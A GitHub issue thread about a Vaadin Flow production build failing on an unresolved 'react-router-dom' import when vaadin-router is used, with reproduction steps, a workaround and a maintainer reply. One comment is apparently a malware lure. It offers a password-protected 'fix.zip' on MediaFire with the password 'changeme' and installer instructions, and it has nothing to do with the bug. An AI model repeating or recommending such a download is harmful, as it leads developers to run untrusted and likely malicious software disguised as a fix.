### ISSUE TITLE
ReactRouterOutletElement.tsx breaks build of Flow application using vaadin-router

### ISSUE THREAD

**Issue by mcollovati** [vaadin/flow#19842]
### Description of the bug

If the Flow application is configured to use `vaadin-router` instead of `react-router` (e.g. by setting `reactEnable=false` in vaadin-maven-plugin), the production build fails on Vite execution because `react-router-dom` import cannot be resolved.

```
[ERROR] [vite]: Rollup failed to resolve import "react-router-dom" from "/xxxxx/vaadin/starters/skeleton-starter-flow-spring/src/main/frontend/generated/jar-resources/ReactRouterOutletElement.tsx".
[ERROR] This is most likely unintended because it can break your application at runtime.
[ERROR] If you do want to externalize this module explicitly add it to
```

The workaround is to exclude the `flow-react` dependency in the POM file.

If it is expected that `flow-react` should be excluded when using `vaadin-router`, it should be explicitly documented. In the [upgrade guide](https://vaadin.com/docs/latest/upgrading#hilla-react-dependencies) it looks like an optional step.

### Expected behavior

A Flow application using `vaadin-router` should not fail during build even if `flow-react` dependency is present.

### Minimal reproducible example

- Clone https://github.com/vaadin/skeleton-starter-flow-spring/
- Update `vaadin-maven-plugin` configuration in POM file adding `<reactEnable>false</reactEnable>`
- Do a production build `mvn clean package -Pproduction`
- Check Vite build error in the console

### Versions

- Vaadin / Flow version: 24.5-SNAPSHOT
- Java version: 17

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mshabarov** [comment]
We can keep in mind the documentation upgrade, but better to fix this in the code.
